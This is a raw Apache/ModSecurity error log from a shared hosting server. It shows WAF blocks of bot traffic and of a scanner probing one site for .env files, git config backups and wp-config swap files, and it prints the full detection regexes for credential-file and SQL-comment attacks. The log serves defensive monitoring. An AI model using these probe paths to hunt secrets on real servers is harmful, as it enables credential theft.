[Tue May 26 13:39:24.022535 2026] [security2:error] [pid 536875:tid 537117] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVM-r_-FTveSGlx1HnQwAAAPU"]
[Tue May 26 13:39:24.282108 2026] [security2:error] [pid 536875:tid 536920] [remote 109.205.180.55:60412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVVNOr_-FTveSGlx1HnSgAAsCw"]
[Tue May 26 13:39:24.747921 2026] [security2:error] [pid 536875:tid 537114] [client 114.119.128.158:52301] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/creative-agency"] [unique_id "ahVVNOr_-FTveSGlx1HnVQAAAPI"], referer: http://www.anujtradingco.com/homepages/creative-agency/
[Tue May 26 13:39:25.810778 2026] [security2:error] [pid 544395:tid 544588] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVNRmrs7g3RMCdp8XIOgAAAD8"]
[Tue May 26 13:39:26.045890 2026] [fcgid:warn] [pid 536875:tid 537010] (70014)End of file found: [client 66.132.186.181:28908] mod_fcgid: can't get data from http client
[Tue May 26 13:39:27.263090 2026] [security2:error] [pid 536875:tid 537013] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVNur_-FTveSGlx1HndAAAAI0"]
[Tue May 26 13:39:28.592176 2026] [security2:error] [pid 544395:tid 544612] [client 114.119.139.220:65125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/"] [unique_id "ahVVOBmrs7g3RMCdp8XIWQAAAFc"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 13:39:29.675412 2026] [autoindex:error] [pid 544395:tid 544644] [client 129.211.229.121:35820] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:29.806142 2026] [security2:error] [pid 544395:tid 544540] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVORmrs7g3RMCdp8XIZwAAAA8"]
[Tue May 26 13:39:29.844948 2026] [security2:error] [pid 536875:tid 537029] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOer_-FTveSGlx1HnlwAAAJ0"]
[Tue May 26 13:39:29.845380 2026] [security2:error] [pid 544395:tid 544579] [client 35.175.92.196:35316] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVORmrs7g3RMCdp8XIcQAAADY"]
[Tue May 26 13:39:29.890337 2026] [security2:error] [pid 536875:tid 536937] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVOer_-FTveSGlx1HnmgAA3z0"]
[Tue May 26 13:39:29.890341 2026] [security2:error] [pid 536875:tid 536998] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "whitesun.in"] [uri "/*update.cgi*"] [unique_id "ahVVOer_-FTveSGlx1HnmQAA33o"]
[Tue May 26 13:39:30.038225 2026] [security2:error] [pid 536875:tid 536918] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/.env"] [unique_id "ahVVOur_-FTveSGlx1HnowAAnCo"]
[Tue May 26 13:39:30.038253 2026] [security2:error] [pid 536875:tid 536936] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVOur_-FTveSGlx1HnqAAAnDw"]
[Tue May 26 13:39:30.039662 2026] [security2:error] [pid 536875:tid 536922] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVVOur_-FTveSGlx1HnpQAAnC4"]
[Tue May 26 13:39:30.054875 2026] [security2:error] [pid 544395:tid 544564] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOhmrs7g3RMCdp8XIdgAAACc"]
[Tue May 26 13:39:30.056700 2026] [security2:error] [pid 536875:tid 537121] [client 35.175.92.196:55468] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVVOur_-FTveSGlx1HnqQAAAPk"]
[Tue May 26 13:39:30.185981 2026] [security2:error] [pid 536875:tid 536928] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.backup"] [unique_id "ahVVOur_-FTveSGlx1HnrwAAiDQ"]
[Tue May 26 13:39:30.186204 2026] [security2:error] [pid 536875:tid 536992] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.bak"] [unique_id "ahVVOur_-FTveSGlx1HnsAAAiHQ"]
[Tue May 26 13:39:30.456204 2026] [security2:error] [pid 544395:tid 544593] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/index.html"] [unique_id "ahVVOhmrs7g3RMCdp8XIgQAAAEQ"]
[Tue May 26 13:39:30.457311 2026] [security2:error] [pid 536875:tid 537018] [client 35.175.92.196:55474] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVVOur_-FTveSGlx1HnuwAAAJI"]
[Tue May 26 13:39:30.482522 2026] [security2:error] [pid 536875:tid 536940] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.env.php"] [unique_id "ahVVOur_-FTveSGlx1HnvwAAsUA"]
[Tue May 26 13:39:30.482860 2026] [security2:error] [pid 536875:tid 536939] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.old"] [unique_id "ahVVOur_-FTveSGlx1HnvgAAsT8"]
[Tue May 26 13:39:30.629505 2026] [security2:error] [pid 536875:tid 536947] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.swp"] [unique_id "ahVVOur_-FTveSGlx1HnxwAAx0c"]
[Tue May 26 13:39:30.632143 2026] [security2:error] [pid 536875:tid 536950] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env~"] [unique_id "ahVVOur_-FTveSGlx1HnygAAx0o"]
[Tue May 26 13:39:30.915012 2026] [security2:error] [pid 544395:tid 544491] [remote 185.192.20.168:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.192.20.168" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIjgAAI18"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:30.915185 2026] [security2:error] [pid 544395:tid 544560] [client 185.192.20.168:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIjgAAI18"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:30.925090 2026] [security2:error] [pid 536875:tid 536954] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config~"] [unique_id "ahVVOur_-FTveSGlx1Hn2AAAm04"]
[Tue May 26 13:39:30.925686 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.bak"] [unique_id "ahVVOur_-FTveSGlx1Hn1gAAm10"]
[Tue May 26 13:39:30.925739 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.old"] [unique_id "ahVVOur_-FTveSGlx1Hn1wAAm1A"]
[Tue May 26 13:39:31.039275 2026] [security2:error] [pid 536875:tid 536966] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVO-r_-FTveSGlx1Hn4AAAhlo"]
[Tue May 26 13:39:31.096751 2026] [autoindex:error] [pid 544395:tid 544573] [client 205.210.31.13:62616] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.129225 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVOhmrs7g3RMCdp8XIiwAAAFo"]
[Tue May 26 13:39:31.145307 2026] [core:crit] [pid 544395:tid 544545] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:31.496902 2026] [autoindex:error] [pid 536875:tid 536899] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.510871 2026] [security2:error] [pid 536875:tid 536906] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVVO-r_-FTveSGlx1HoFwAA4R4"]
[Tue May 26 13:39:31.513459 2026] [security2:error] [pid 536875:tid 536985] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/ADMIN/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoGgAA4W0"]
[Tue May 26 13:39:31.522429 2026] [autoindex:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.522954 2026] [autoindex:error] [pid 536875:tid 536982] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.546527 2026] [autoindex:error] [pid 536875:tid 536912] [remote 45.148.10.95:51320] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:31.586309 2026] [core:crit] [pid 544395:tid 544629] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:31.630919 2026] [security2:error] [pid 536875:tid 536908] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/API/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoIAAA6CA"]
[Tue May 26 13:39:31.642855 2026] [security2:error] [pid 536875:tid 536929] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/APP/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoJwAA9TU"]
[Tue May 26 13:39:31.656433 2026] [security2:error] [pid 536875:tid 536937] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Api/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKAAApT0"]
[Tue May 26 13:39:31.656846 2026] [security2:error] [pid 536875:tid 536927] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACK/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKQAApTM"]
[Tue May 26 13:39:31.656874 2026] [security2:error] [pid 536875:tid 536923] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACKEND/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKgAApS8"]
[Tue May 26 13:39:31.658781 2026] [security2:error] [pid 536875:tid 536933] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BE/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoKwAAuTk"]
[Tue May 26 13:39:31.668341 2026] [security2:error] [pid 536875:tid 536936] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Backend/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoLQAA9Dw"]
[Tue May 26 13:39:31.668615 2026] [security2:error] [pid 536875:tid 536926] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Be/.env"] [unique_id "ahVVO-r_-FTveSGlx1HoLgAA9DI"]
[Tue May 26 13:39:31.947897 2026] [security2:error] [pid 536875:tid 536924] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVVO-r_-FTveSGlx1HoSwAAszA"]
